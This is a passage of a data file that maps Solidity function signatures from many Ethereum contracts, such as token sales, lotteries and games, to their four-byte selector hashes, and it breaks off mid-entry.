"jackpots()": "0x77d70b1f", "currentpreicobonus()": "0x09798e2f", "ORNETCOIN()": "0x76bd28bf", "RESERVED_PARTNERS_SIDE()": "0xc065fcf1", "crowdsalePrice()": "0x1207bb8e", "finishPreSale2()": "0x5d49c199", "honestisFortbackup()": "0x5c2eb1ef", "preICOwei()": "0xf75fb878", "freePeriodDuration()": "0x0b520ad5", "priceEUR()": "0x307d2a90", "ceoEtherBalance()": "0x3f58a043", "plan_active_time()": "0x1e711ec0", "exchange_rate()": "0x171ef0b2", "initialBankroll()": "0xfaee4a10", "prizeMoney()": "0x65213840", "tapPoll()": "0xcae6b9c5", "seed_coins()": "0x2672c952", "VREO_SALE_PHASE_2_END_TIME()": "0xf1e9a514", "contract_owner()": "0x384f58eb", "fundOwnerWallet()": "0xc7d6e988", "isFirstStageTokensMinted()": "0xae0eadbf", "paused_3()": "0xc9fa595b", "deathData_v12()": "0xdd3ef6a6", "winningPot()": "0x079d7d7f", "angelWheelFinancing()": "0xab75a4a2", "wrongClaimerOrUnsetInManager()": "0x01c432ce", "second_bonus_amount()": "0xc32dee3a", "time_on_trademarket()": "0x0ce52e25", "restrictionRemoved()": "0xf5a98558", "startStage2Time()": "0x4c81c4d7", "Announcement()": "0x538d1267", "getActiveShareholdersArrayLength()": "0x6b89be03", "randomA()": "0xd192367b", "totalPartnerWithdrawSupply()": "0xe07ccdeb", "winningPrice()": "0xc1f52604", "cooldownTime()": "0xb319c6b7", "tokensaleTokensPerEtherNow()": "0x766e8b27", "iconomiTokenSupply()": "0x6c3e6e0c", "MINIMUM_QUORUM()": "0xb159beac", "getIssueAssignee(uint256,bytes32)": "0x0ed21029", "getIsClosed()": "0x0a80ef45", "getInterest(uint256,uint256)": "0x728af7ec", "getInstitutionByName(string)": "0x6da1833c", "getInstitutionByAddress(address)": "0x2b98222e", "getIndex(uint256,uint256)": "0xb7de47d3", "getId(uint256,uint256)": "0x24fc65ed", "getHomeadvIndex(uint256)": "0xbba91ea7", "get_hash(uint8,bytes32)": "0x75608264", "getGasPrice()": "0x455259cb", "getGasForXau(address)": "0x3e853128", "getFullCompany(address,uint256)": "0x4a7e049e", "GetFreeCnt()": "0xd63547e6", "getFmLength()": "0xba1162d7", "getExecPrice()": "0x752bacce", "getExecCost(uint256)": "0x2fa7cbfb", "getDraw(uint256)": "0xbe6307c8", "getDomain(uint256)": "0x1a7a98e2", "getDogName(address)": "0x16e55626", "getDocumentDetails(uint256)": "0x80ede329", "getDisclaimer()": "0xd2b0d554", "getDataRequest(uint256)": "0x88f53db1", "getDataRequestLength()": "0xcf69df28", "getDataPoint(int256,uint256,uint256)": "0x152cf9db", "getCurrentWinner()": "0x329bfc33", "getCurrentShareholders()": "0x2bf4e53d", "getCurrentLevel()": "0x77c78df9", "getCreditorAmounts()": "0x81064e2d", "getCreditorAddresses()": "0xd3edcb5b", "GetContractAddr()": "0xd408746a", "getConfigUint(int256,bytes32)": "0x5c1b3ca1", "getConfig(string)": "0xb44bd51d", "getConfigBytes(bytes32)": "0x62c7855b", "getConfigBool(bytes32)": "0xea3ebae6", "getConfigAddress(bytes32)": "0xf896503a", "getCommitment(uint256)": "0x69bcdb7d", "getCommission()": "0xe65d6b49", "getCoin(uint256)": "0xda311588", "getCoinStats(uint256)": "0x3aa94b1d", "getClient(uint256)": "0xd0068f80", "getCity(uint256)": "0xd7130651", "getChainyURL()": "0x233120aa", "getChainyTimestamp(string)": "0xe8b13c44", "getChainySender(string)": "0x919edc7c", "getChainyData(string)": "0x045236b4", "getCertifierStatus(address)": "0x05b765ea", "getCertifiersCount()": "0x6e63015c", "getCertifierDb()": "0x56d73ad1", "getCertifierAtIndex(uint256)": "0x2f695053", "getCertifiedStudentsCount()": "0x038461ea", "getCertifiedStudentAtIndex(uint256)": "0xd5582205", "getCertificationDocumentAtIndex(address,uint256)": "0xde629235", "getCertificationDbStatus(address)": "0xfd260dfc", "getCertificationDbCount()": "0x808ab1d6", "getCertificationDbAtIndex(uint256)": "0x777feff5", "getCertification(address)": "0xc88cc6ac", "GetCategoryValue(uint8)": "0x7281854d", "GetCategoryNumber(bytes4)": "0x769dc523", "getCallbackAddress()": "0x1f6e5117", "getBytesFromNumbers(uint8[3])": "0xd120a284", "get(bytes32)": "0x8eaa6ac0", "getByOwner(address,uint256)": "0xc00ca383", "get_burned(bytes32)": "0xc06c4474", "getBot(uint256)": "0x5f70d9ac", "getBotStats(uint256,uint256)": "0x4ae9af61", "getBotBillingIndex(uint256,uint256)": "0x618fa9ce", "getBot()": "0xe422ebe9", "getBill(uint256,uint256)": "0x8c98117c", "getBet(uint256)": "0x061e494f", "getBets()": "0xa6afd5fd", "getBeneficiary()": "0x565a2e2c", "getBalanceByAdress(address)": "0x1177892f", "getBalance()": "0x12065fe0", "getAvailable()": "0xf9cc0605", "getApprovedProxys()": "0xc6ed8e1b", "GetAndReduceFeesByFraction(uint256)": "0xc8edf65e", "getAdminName(address)": "0x579cdf17", "get(int256,address)": "0xe7b48f74", "get_address(address,string)": "0x42c69566", "getAddress(bytes32,string)": "0x6795dbcd", "getAddress(bytes32)": "0x21f8a721", "getActual()": "0x04fc11d5", "getActorBillXdetail(address,uint256,bool)": "0x10082bff", "getAccountInfo(uint256,uint256)": "0xfa7d68f1", "generousFee()": "0x419db07b", "generateShortLink()": "0x6f6c0244", "generateId(uint256)": "0x4d70d1d7", "GeneralPurposeProfitSplitter()": "0xa10edc55", "GameOfThrones()": "0x2143da91", "GameEnds()": "0xefa7e56b", "GamblerPerAddress(address)": "0xfc108f70", "funnel()": "0xca708230", "fundsOf(address)": "0x43243797", "fundBalance()": "0x3c067945", "fromTLA(string)": "0x891de9ed", "fromAddress(address)": "0xb72e717d", "fresh()": "0xb466b76f", "freezeCoin()": "0xac562666", "_forward(address,bytes)": "0xa4d575ce", "forward()": "0xd264e05e", "rakeAddress()": "0xc33b76c6", "crowdTokensTLP2()": "0x707f4ecd", "tokenPriceIncremental_()": "0x0ea8e5ac", "lockIn()": "0x1564d706", "claimTreshold()": "0xa3032f25", "OPERATIONS_SHARE()": "0xd191d7f4", "numberParticipants()": "0x54d89c92", "_ownerDist()": "0x25062287", "BUYPRICE()": "0x749e8b88", "first_bonus_amount()": "0xbb0936f7", "stopPreIco()": "0x9d38cea3", "BNN_ALLOCATION()": "0x579f0789", "freezer()": "0x92716054", "preIcoTokensDistributed()": "0x59cf901a", "ecosystemAddr()": "0x93ed013d", "resetContractDeploymentDate()": "0xc225bf03", "SECOND_TIER_SALE_START_TIME()": "0x82dc107d", "tgeSettingsPartInvestor()": "0xc25d0ac1", "finalizedHoldingsAndTeamTokens()": "0x0a27813d", "kycLevel()": "0x9efc94a6", "numRegistrants()": "0xec3a6f73", "thirdMonthEnd()": "0xa5fefcfd", "hasParameters()": "0x4c6d8aac", "totalInitialBalance()": "0x1d107603", "giveawayAddr()": "0xd4f96a09", "randnum()": "0x64aea551", "oneCoin()": "0x0bba662d", "pendingJackpotForWinner()": "0x6428fed4", "BASE_BET_ETHER()": "0x1a94d49b", "founderAllocatedTime()": "0xd8ee796f", "adPriceHalfDay()": "0x66035cc0", "phaseThreeRate()": "0xa20aede0", "lockPeriod1()": "0x105c287b", "exodus()": "0xad1d0dcf", "sellCommission()": "0x0a766cfa", "unlockingBlock()": "0xb7bb018d", "preICOBonus()": "0x06f7ec97", "marketingTokenWallet()": "0xf433e12e", "getNumAds()": "0x09bd98a4", "allowedAddress()": "0x4cf78170", "getAgentsNum()": "0x0d6e548e", "contrp3d()": "0x12c27c64", "amountFundTeam()": "0xc70e8640", "minSaleBalance()": "0xa41e61a4", "scoringDuration()": "0xd45318b9", "vestingContract()": "0x5e6f6045", "lockReleaseDate6Month()": "0xf691b30b", "TOKENS_BOUGHT()": "0x3750e05a", "lockUpEnd()": "0x70aca69a", "humanityFund()": "0x6244326d", "brandAccountsLength()": "0xe507e7a4", "defaultTimeLock()": "0x9c36e141", "publicAllocationEnabled()": "0x0c0e6dea", "growth()": "0xa6940238", "walletCommunityReserve()": "0x4b467105", "supportHarvestQuorum()": "0x0d40e8d6", "HOUSE_EDGE()": "0x8daaaa2f", "Rate10()": "0x735af2eb", "any_customer_payments_yet()": "0xca5450ce", "hasInitCard1()": "0xfb68aa89", "oraclize_network_name()": "0x39e44ca4", "gameFinishedTime()": "0xfefaa626", "cutoffTimestamp()": "0x203a79f6", "collectedEth()": "0xddf063c8", "getAbilities()": "0xc73d3b30", "rates()": "0x43f48fbd", "numLoveItems()": "0xcaaf6d21", "teamHoldAmount()": "0x3ece9c61", "getTiers()": "0xde170570", "feeForArtWorkChangeRequest()": "0x2c52d930", "FEE_OWNER()": "0x49edfb94", "marriageStatus()": "0xd2521034", "payRate()": "0xf97e17d9", "RET_DIV()": "0xdece296f", "TeamWalletAmount()": "0xc0b204a6", "giftIsTo()": "0x2ded516e", "firstAuctionsExtendedChunkDuration()": "0x6d41a3fb", "suspended()": "0x702efdf3", "AgreementHashEn()": "0xc4319bd8", "claimH2()": "0x6e13cdfe", "minToken()": "0xa859a092", "OTHERCRUISER()": "0xecd59d9b", "numToksSwitchedOver()": "0x1d7786e3", "SALE_END_DATE()": "0x27d741df", "etherWallet()": "0x0cd74cd9", "poolAddress()": "0x1755ff21", "m_OwnerFees()": "0xd1ecdec6", "usePluginWhitelist()": "0x7c2d86f7", "BONUS_WINDOW_1_END_TIME()": "0xdf0da20e", "forSaleSupply()": "0xaf13f1ad", "PRESALE_ICO_PORTION()": "0xf7b43abf", "refundStartTime()": "0x6aba899b", "addChunk1ToWhiteList()": "0xfff85d49", "NumberAddresses()": "0x49eb6d6f", "coinIssuedGemmyMusic()": "0xe8c4fa04", "claimedUsers()": "0x7bb0688d", "icoSoftCapInWei()": "0x00fe03e3", "minimumRewardWithdrawalLimit()": "0x6b015897", "maxNumberMembers()": "0xf8e2d041", "Human()": "0x53b1b49b", "addCar(address[4],uint256,uint256)": "0x55138d97", "addMake(address,uint256,uint256)": "0x7d6c1ff1", "bulkAddMake(address[],uint256[],uint256[])": "0x146740ee", "bulkAddCompany(address[],uint256[])": "0x680660d4", "addCompany(address,uint256)": "0xacc69261", "transferCard(address,uint256,uint256)": "0x119f2c9f", "ownerOf(uint256,uint256)": "0xd9dad80d", "getCuts()": "0x92bc3251", "getAd(uint256,uint256)": "0x29e10c13", "getFullRace(uint256)": "0x3c5f2bf2", "getRace(uint256)": "0x0d71aba5", "purchaseAd(uint256,uint256,string,string)": "0x89009ab0", "joinRaceAndFinish(uint256,uint256)": "0x9e6d4cd0", "createRace(uint256,uint256,uint256)": "0xd9e7c8ca", "_addrNotNull(address)": "0x2ecf307e", "ClearCLevelSignature()": "0xd7d90fb1", "SignatureInvalidity()": "0xc0a42d91", "transferCMO(address)": "0x691b7ce0", "transferCTO(address)": "0x777dff4a", "transferCEO(address)": "0xca965c3f", "CMOSignature()": "0x87d2544d", "CTOSignature()": "0x1f30edc7", "CEOSignature()": "0x6d8f01d1", "getDocuments(address)": "0x27f50a2d", "getAddressesByDocHash(bytes)": "0x5b95f65e", "Fantom()": "0x23655d7b", "changeReward(uint256)": "0xcf5d57db", "changeTsaLink(string)": "0x6d4546a2", "disablePurchase()": "0xb47d7409", "enablePurchase()": "0x7e00d6d6", "updateValue(bytes32,uint256,uint256)": "0x5b5d2c8f", "addVpf(bytes32,uint256,uint256,uint256,uint256,uint256[])": "0xb0273de1", "request(bytes32,uint256)": "0x775146c3", "CryptosisToken(uint256,string,string)": "0xe8814606", "SkySwapToken()": "0xac697fb5", "claimOwnership(uint8,bytes32,bytes32)": "0x69061355", "invalidateSignature(uint8,bytes32,bytes32)": "0x7d6f174e", "validSignature(uint8,bytes32,bytes32)": "0x363f7746", "concat(uint8,bytes32,bytes32)": "0x862fd38c", "LiteToken()": "0xb2cefd2f", "log(string,bool)": "0xc3b55635", "log(string,bytes32)": "0x3692d61a", "log(string,bytes)": "0x23cdd8e8", "EthereumTestToken()": "0x1fcc02e8", "HPA_TokenERC20(uint256,string,string)": "0xb8ddc4df", "Coin(uint256)": "0x49843982", "TopsToken(uint256,string,uint8,string)": "0xf988da4a", "RadioCoin()": "0x6f0663f0", "setSanityBounds(uint256)": "0xfed82ef3", "setOracleURL(string)": "0x96bc5ab7", "setFreezeOracle(bool)": "0xb0cccbc3", "setPOLYUSD(uint256)": "0x0f71590c", "updatePrice(uint256[])": "0xd28fdde8", "addAuthByCode(string,string)": "0x1d7747d1", "CioCoinERC20180629Token(uint256,string,string,uint256)": "0x84d60043", "DigitalKeyCoinKO()": "0xd6d3e19c", "BBCToken()": "0x623e4fb8", "setBreedingAuctionAddress(address,address)": "0x20495427", "_createToken(uint256,uint256,uint256,uint256,address)": "0x0cc3db97", "callMeMaybe()": "0xfc7f7957", "LEGLToken()": "0x63f6271f", "LEGLToken(uint256)": "0x32089b74", "restartElection()": "0x3d946c53", "getHowManyWinners()": "0x1cce70d4", "resetTotalVotes()": "0xc4788efe", "getNumberOfCandidates()": "0x7a84d13e", "resetNumberOfCandidates()": "0x6e39eb85", "hasAddressVoted()": "0x92893fb9", "apply(string,string)": "0x83e4eed0", "FINX2Token()": "0xfec5c5f7", "createAddressHash(address,bytes32)": "0xd530040a", "withdraw(bytes32,address)": "0x1b258d50", "SafiraToken()": "0xe199c8a8", "burnFromAnotherAccount(address,uint256)": "0x4290db52", "burnMe(uint256)": "0x471a23c8", "DealerSocketCoin()": "0x45556969", "VestTokens(address,uint256,uint256,uint256,bool,string,uint256)": "0xfaea624c", "create(address,uint256,uint256,uint256,bool,string)": "0x31f850e6", "getTracks2()": "0xf159f38f", "registerTrack(bytes32,uint256,bytes32,bytes32,bytes32,bool)": "0xac4e677c", "getWinnerFunds(uint256[])": "0x525d0537", "getWinner(uint256[])": "0x16e74f09", "getRandomCase(uint256,uint256[])": "0xee5418f0", "enableStartBattle(string)": "0x47373033", "isNewPlayerInBattle(string,address)": "0x25266f96", "isExistingPlayerInBattle(string,address)": "0xa0b7ebbd", "isBattleCreator(string,address)": "0x10fa01e6", "isExistingBattle(string)": "0x7bb20df6", "isNewBattle(string)": "0x724dbf36", "moreMinFunds(uint256)": "0xec280bf6", "startBattle(string)": "0x62de871e", "joinOutBattle(string)": "0x5087abc7", "cancelGame(string)": "0x2ccce58a", "joinBattle(string)": "0xa1b4f57c", "createNewGame(string,uint8,uint256[],uint256[])": "0x7b069edb", "changeMinFunds(uint256)": "0x4664fe1b", "maxOfArray(uint256[])": "0xa9505eb4", "minOfArray(uint256[])": "0xa802afa1", "compare(uint256,uint256)": "0xf360234c", "createAwardTokens()": "0x67e2a647", "DrawWinning(uint256,uint256)": "0xa23a373f", "Lottery(uint256,uint256,uint256)": "0xf860e64a", "SimpleStateChannel()": "0xc0ebc67a", "getDefaultAllowance(string)": "0x78ea787b", "getChildsAmount(address)": "0x48c20a24", "getAllowanceAmount(address)": "0xf8ba8e6a", "getChild(address)": "0x25a10a70", "getAdultByAddress(address)": "0x73e3e7a7", "getChildByAddress(address)": "0x1079ed67", "refundBalance(address)": "0x56c8e12e", "approveRefund()": "0x35a9731b", "getAllowance()": "0x973e9b8b", "nextAllowancePeriod(bool)": "0x80aab099", "doSomething()": "0x82692679", "buyProduct(uint256)": "0x8642269e", "deleteProduct(uint256)": "0xed90c7b7", "addProduct(uint256,uint256,string,uint256)": "0xa2744a22", "getProductIdAt(uint256)": "0xd1241e67", "getProductCount()": "0x4a348da9", "Shop(address)": "0x54f56df1", "maxPossibleWithdrawal()": "0x56c8c30c", "EasyMineTokenWallet()": "0x53c24064", "SimplePaymentChannel(address,uint256)": "0x40243ecd", "testTooFewTokens()": "0x7f1b1e51", "viewFunc()": "0x7f2857b6", "pureFunc()": "0x231e18a9", "testView()": "0x4dec9b57", "testPure()": "0x1b27274b", "totalPicks()": "0xf039d9d5", "getPick(uint256)": "0xa6f1c939", "deletePick(uint256)": "0x5ad64dc5", "updatePick(uint256,uint256)": "0xa82aa270", "addPick(uint256)": "0xf589cbbe", "StaffPicks()": "0xaab75253", "getVote(uint256,address)": "0xbc3f931f", "vote(uint256,string)": "0x24108475", "createProposal(string,uint256)": "0x35facf78", "Dao1901Votes(address)": "0x93b71fe5", "IssueToken(string,string)": "0x8182c6a7", "resumeICO(address)": "0xe270bc81", "haltICO(address)": "0xbdbb829d", "start(address)": "0xdd0b281e", "getParametersHash(uint256,uint256,uint256,uint256,address,address)": "0x4eb09bf4", "setParameters(uint256,uint256,uint256,uint256,address,address)": "0x0d609939", "SimpleICO()": "0x2cbcaba9", "logPriceAfter()": "0x3227563a", "logPriceBefore()": "0x9437563c", "getAvgPrice()": "0xf01e66ec", "dynamicReverse(uint256[])": "0xbeda363b", "fixedReverse(uint256[10])": "0xb96f54d1", "baby()": "0xece8a1d9", "OLTestSynatax()": "0xfa5cdc2b", "findAccess(address)": "0x464bb7a3", "createPasswordChallenge(bytes20,bytes32)": "0xe2aa6c66", "createParty()": "0x21d50273", "getParties()": "0xa8311aa8", "shouldPass()": "0xeb5dd1e3", "exchangeEtherToToken()": "0x637b55eb", "exchangeTokenToEther(address,uint256)": "0x070caf36", "setEtherToTokenAllowed(bool)": "0xf179a86e", "setTokenToEtherAllowed(bool)": "0x378ebf93", "setEtherQuota(uint256)": "0x783f7b98", "setTokenQuota(uint256)": "0xfe6fef44", "quotaUsed(address)": "0x496e41d2", "withdrawToken(address,address,uint256)": "0x01e33667", "withdrawEther(address,address,uint256)": "0xed2eb843", "GreenMed()": "0xb44a5e64", "MSPPlaceholderMock(address,address,address,address)": "0x0996a625", "token(uint256,string,uint8,string,address,uint256)": "0x6ea6db3c", "changeMinStake(address,bytes32,uint256)": "0x777f942d", "changeStakeRate(address,bytes32,uint256)": "0x7def2fdf", "changeTolerance(address,bytes32,uint256)": "0xce3cc3aa", "changePrice(address,bytes32,uint256)": "0x595cb7a3", "shutdownMarket(address,bytes32)": "0xe134c9ff", "addMarket(address,uint256,uint256,uint256,uint256)": "0x00dfafa4", "test_FiftySixPercent()": "0x587097ab", "test_OverSixtyPercent()": "0xbe916531", "test_TorontoRules()": "0xb4e28f79", "Saflok(bytes32,bytes32,bytes32,bytes32)": "0x56fbd029", "GetBalance()": "0xf8f8a912", "Mint(int256,uint256)": "0xb8726395", "addProductAtId(uint256,string,uint8)": "0x936d2b0f", "addProduct(string,uint8)": "0xf7a80784", "getProductStructById(uint256)": "0x6226bddb", "getProductById(uint256)": "0x3f70c2b4", "listProducts(address)": "0xac1c1443", "BuyerSeller()": "0x5e5ca8d4", "preter(uint256)": "0x103b0506", "demander(uint256)": "0x0f40d645", "getNbDemandes()": "0x524bd747", "getDemande(uint256)": "0x2ce78fc0", "getMaxEmpruntable(address)": "0x1cdb0989", "tokenRecoveryFromTrade(address,address,address,uint256)": "0x8ef44301", "createNewTrade(address,uint256,uint256)": "0x922775e3", "TinyOracleDispatch()": "0xabb29f70", "addPlayerName(string)": "0xe1de373f", "strConcat(bytes,string,bytes)": "0xaaea44c4", "supercustomhash(bytes)": "0x78b17bd1", "bytes20ToString(bytes20,bytes20)": "0xd6a83613", "winningCard()": "0xf8351daf", "updateRoundsInformation(uint256)": "0xd86fb89d", "isNewRound()": "0x5352b889", "createRounds(uint256)": "0x76323253", "calculateClaimableRewardTillRound(address,address,uint64)": "0x15b66fef", "calculateClaimableReward(address,address)": "0xbd9ead1f", "claimRewardTillRound(uint64)": "0x7af05516", "getBalanceModificationRounds(address,address)": "0x71608d05", "isModifiedInRound(address,address,uint64)": "0xfa3276bc", "getRoundBalance(address,address,uint256)": "0xcca26917", "setBlocksPerRound(uint64)": "0x3c9c97f0", "changeIssueManager(address)": "0x522e35fb", "changeRoundManager(address)": "0xc38e650f", "changeRewardManager(address)": "0xd2631e42", "setReward(uint64,uint256)": "0x205360e0", "BankeraToken(uint256,uint64)": "0x3feb4f83", "newinitialSupply(uint256)": "0x8c366dd3", "updateUnclaimedDividend()": "0x7569b369", "calcDividend()": "0x28761ea5", "startDividendDistribution()": "0x97267ae9", "setDividendDistributionPool(address)": "0x54ad7e1c", "payoutOCDividend(address,address)": "0x8aa4e240", "claimableOCDividend(address,address)": "0xfff57fe1", "claimOCDividend()": "0x5c0a8177", "claimableDividend()": "0xf2530d1d", "calcClaimableTokens()": "0x5c148b47", "startTokenDistribution()": "0x724edf00", "setTokenDistributionPool(address)": "0x7f38b980", "removeParticipant(address,address)": "0x2cbf4e27", "isParticipant(address,address)": "0xa0742666", "returnAmountOfELIXAddressCanProduce(address)": "0x5fc8cc16", "removeFromTotalSupply(uint256)": "0x83e219eb", "createAmountFromEXORForAddress(uint256,address,address)": "0xa837c35e", "elixir()": "0x96f392f4", "CrowdsalePorto(address,address)": "0xeb7f4c0d", "calculateDevCut_(uint256)": "0x83607b02", "calculateDividends_(uint256)": "0x4cc653c8", "GetOwner(string)": "0xad83bfce", "GetDappinfo(string)": "0xd7901645", "GetDescript(string)": "0xc284cdc5", "SetPlatformInformation(string)": "0xcc82e72e", "SetHotLists(string)": "0xabb1a33a", "SetOwner(string,address)": "0x3ba8f108", "SetDappinfo(string,address,address,string,string)": "0x94cdbea1", "SetDescript(string,string)": "0x6c1334bf", "DeleteProject(string)": "0xd631f6d4", "InsertProject(string,string,address,address,string,string,address)": "0x8f348cfe", "__FindProjects(string)": "0xe8ad1015", "gradeinfo()": "0x41dedc58", "reduceTotalSupply(uint256)": "0x3510b66c", "tokenApprove(address,address,uint256)": "0xfb3f4d29", "resetUsedToday(uint8,uint8)": "0xd8e8752a", "changeUsed(address,int256)": "0x2042495b", "tokenTransferFrom(address,address,address,uint256)": "0xf3913e69", "tokenTransfer(address,address,uint256)": "0x15eaef6b", "Ledger(address,uint256,uint256)": "0x2d1a67e1", "checkIn(uint256)": "0xe95a644f", "claimUnrented()": "0x809e4a2d", "rentOut(uint256)": "0x848efb3d", "resumeTransfers()": "0xc77a16ed", "pauseTransfers()": "0x47af9957", "completeCrowdsale()": "0x3cbf41d2", "dilute(address,uint256)": "0xccd39537", "changeTimes(uint8,uint8)": "0x1fae9361", "changeRental(address)": "0x0ea49bc1", "changeLedger(address)": "0x63750dfb", "changeClub(address)": "0xc847259c", "Token(address,string,uint8,string,address,address)": "0x36066f71", "exec(address)": "0x6bb6126e", "offer(address,uint256)": "0x6b212960", "Rental(address)": "0x0e43806a", "unMutex()": "0x0da4fc46", "CradTimeLock(address)": "0xce43c097", "ContractBHVC()": "0xacc3b363", "mintLongTermTokens(address,uint256)": "0xca79e2f2", "mintRewardTokens(address,uint256)": "0x6eee2dad", "mintSoldTokens(address,uint256)": "0xc4596419", "pauseToken()": "0x2c349627", "setLongtermMinter(address,uint256)": "0xc740bc9f", "setRewardMinter(address,uint256)": "0xce4ae74a", "setSaleMinter(address,uint256)": "0x3b47dab6", "ZenomeCrowdsale()": "0x52c1d3d5", "ZNA(uint256)": "0x8f8eabea", "changeMinContrib(uint256)": "0x74772667", "increaseMinPurchaseQty(uint256)": "0x2ebeee0f", "increaseSaleLimit(uint256)": "0xc030f3e2", "ShopiBlock()": "0x1d38869b", "setAlias(string)": "0x6a293d04", "transferFromPreSignedHashing(address,address,address,uint256,uint256,uint256)": "0xb7656dc5", "decreaseApprovalPreSignedHashing(address,address,uint256,uint256,uint256)": "0x59388d78", "increaseApprovalPreSignedHashing(address,address,uint256,uint256,uint256)": "0xa45f71ff", "approvePreSignedHashing(address,address,uint256,uint256,uint256)": "0xf7ac9c2e", "transferPreSignedHashing(address,address,uint256,uint256,uint256)": "0x15420b71", "revokeSignature(bytes)": "0xccbfc6ed", "transferFromPreSigned(bytes,address,address,uint256,uint256,uint256)": "0xbca50515", "decreaseApprovalPreSigned(bytes,address,uint256,uint256,uint256)": "0x8be52783", "increaseApprovalPreSigned(bytes,address,uint256,uint256,uint256)": "0xadb8249e", "approvePreSigned(bytes,address,uint256,uint256,uint256)": "0x617b390b", "transferPreSigned(bytes,address,uint256,uint256,uint256)": "0x1296830d", "setBonusesForAmounts(uint256[],uint32[])": "0xafff5064", "computeTimeBonus(uint256)": "0x0a0d5509", "setMemberId(address,uint256)": "0xb2a1c540", "setMembershipType(address,uint256)": "0xeafb2b7a", "updateMemberAddress(address,address)": "0x78b226c4", "requestMembership()": "0x7b10b293", "Quantastic()": "0xf6af2718", "TwoDimensions()": "0xc117cfe2", "testnetWithdrawn(uint256)": "0x0b02177f", "DIETSweets()": "0x1638e70d", "TootyrCrowdSale()": "0x9609e488", "JTCCtoken(uint256,string,string)": "0xaf6a2c5c", "HongmenToken(uint256,string,uint8,string)": "0x9917ccb8", "changeHolderCount(uint256)": "0xec8cae23", "configure(uint256)": "0x1eb25e0a", "GIRLToken()": "0x442d1759", "transferTokensAndDividends(address,address)": "0x0f64864d", "TwoStandardToken(uint256,string,uint8,string)": "0x2436d4e3", "ReleaseTokenForTeamAdvisersPartners()": "0x302c46ba", "ReleaseTokenForReserveFund()": "0xa79ac3be", "testingSelfDestruct()": "0xb62d4301", "divertDividendsToBankroll()": "0x9de518ba", "addNewBetAmount(uint256)": "0x943bd25d", "jackpotGuard(uint256)": "0xebf5cdfd", "_finishSpin(address)": "0x8f36d03e", "_decodeBuyData(bytes)": "0xc572e9cb", "_decodePriceData(bytes)": "0xec4e530d", "_deposit(address,address,uint256,bytes)": "0xf779a68d", "_getHashKey(address,uint256)": "0xd865897c", "withdrawPLAT()": "0x73fcfea1", "updateExpiry(uint256)": "0xd359f82c", "buyWithETH(address,uint256)": "0x95a51669", "withdrawItem(address,uint256)": "0x3e9f9664", "extendItem(address,uint256)": "0x542cfdf0", "getHashKey(address,uint256)": "0x7a6ba98c", "_safeMul(uint256,uint256)": "0x83714b27", "_getHash(address,address,address,address)": "0xf38d5cb9", "_getFee(uint256,uint256)": "0xa03b1ea9", "getFee(uint256,address,address,address,address)": "0xd71cf1e4", "updateCustomFee(uint256,address,address,address,address)": "0x69d25ff2", "whitelistAddresses(address[],bool)": "0x62e7707e", "BCW(uint256,string,string)": "0x1b0e3061", "viewToken(uint256)": "0x8334d195", "buyToken(uint256,string,string)": "0x4f7dad6a", "TokenHNC(uint256,string,string)": "0x7de7ea78", "rejectTokens(address,uint256)": "0x3d02c85b", "StoriqaCash()": "0x6c6e5108", "BKUToken()": "0x8fe9a12f", "allocationOf(address)": "0xa4f82f27", "allowTransfer(address,uint256)": "0x19c02b27", "allowPurchase(uint256)": "0xf2b2f40c", "isPurchaseWithinCap(uint256,uint256)": "0xfd13a7ce", "isIcoOpen()": "0x35862824", "vestedTransfer(address,uint256,uint256)": "0x5f6ecea0", "changePolyRegisterationFee(uint256)": "0xa79094b7", "expiryCheck(string)": "0xc51dc993", "changeExpiryLimit(uint256)": "0x208b080f", "registerTicker(address,string,string,bytes32)": "0xc9584008", "isReserved(string,address,string,bytes32)": "0xce9af2b9", "getDetails(string)": "0x1328fd8f", "checkValidity(string,address,string)": "0xac1e765b", "WuZeFoundation()": "0xebba5184", "updateIsAttached(uint256,uint256)": "0x3a78e324", "_createAsset(address,uint256,uint256,uint256,address)": "0x3d6759ec", "setBatchDetachCollectibles(uint256[])": "0xabd44556", "setNFTDetached(uint256)": "0xe080241c", "setDetachmentTime(uint256)": "0x5bc8a672", "toggleAttachedEnforement(bool)": "0xf603fa92", "burnAssetOperator(uint256)": "0x0f23a104", "setCanBurn(bool)": "0x386c69f2", "spawnAssetWithCreator(address,uint256,uint256,uint256,address)": "0xbc4af295", "spawnAsset(address,uint256,uint256,uint256)": "0xefc58aea", "batchSpawnAssetWithCreator(address[],uint256[],uint256[],uint256[],address[])": "0x651883c1", "batchSpawnAsset(address[],uint256[],uint256[],uint256)": "0xff950e90", "batchSpawnAsset(address,uint256[],uint256[],uint256)": "0xa7ffe560", "setTypeName(uint32,string)": "0x289b5b15", "setPermanentLimitForType(uint32,uint256)": "0xc2e2a33e", "setTokenURIBase(string)": "0xda2bbfc7", "batchBurnAssets(uint256[])": "0xd98bce37", "requestDetachmentOnPause(uint256)": "0xdd280c7a", "batchDetachAssets(uint256[])": "0x6ff2817c", "batchAttachAssets(uint256[])": "0x89206411", "attachAsset(uint256)": "0xc0f64f43", "requestDetachment(uint256)": "0x0dec1c23", "batchSetApprovalForAll(address[],bool)": "0x17342859", "batchApprove(uint256[],address)": "0x38752e58", "batchSafeTransferFrom(uint256[],address,address)": "0x9493f012", "multiBatchSafeTransferFrom(uint256[],address[],address[])": "0x07ff1413", "batchTransferFrom(uint256[],address,address)": "0x91177db4", "multiBatchTransferFrom(uint256[],address[],address[])": "0x21bcc5e5", "totalBurnedOfType(uint256)": "0x099015d9", "totalCreatedOfType(uint256)": "0x6143abba", "totalSupplyOfType(uint256)": "0xb59712af", "getAssetIDForTypeSequenceID(uint256,uint256)": "0xef8d4a49", "_setTokenURIBase(string)": "0x5adb5813", "Namek()": "0xe35b9699", "addieren(uint256,uint256)": "0x643fcd27", "guthabenAnzeigen(address)": "0x7213e335", "abbuchen(uint256)": "0x5820dce5", "einzahlen()": "0x81fb3803", "TokenFactory(uint256,string,uint8,string)": "0xccf41499", "posscoin()": "0xd2cfe5a7", "emergencyDropEth()": "0x00b55554", "setEditModeBool(bool)": "0xa7188b4e", "_withdraw(string,string,bool)": "0x60a1623f", "WithdrawEmergency()": "0xe85393d7", "Withdraw(string,string)": "0x8611643a", "Call()": "0x34e22921", "GetTime(uint8)": "0x66e41cd7", "PayPoker(string,string)": "0x899d840f", "Buy(uint8,string,string)": "0x4235e98e", "Vegas()": "0xf5556d78", "RankScore(address)": "0x47615fa1", "HandWins(address)": "0xc7f31f1c", "HandWinsView(address)": "0xaef3575e", "GetWinCards()": "0x4a2db4d8", "GetPlayerCards(address)": "0x2f262471", "DrawAddr()": "0xe57bc079", "DrawHouse()": "0x5afc190d", "GetCardInfo(uint8)": 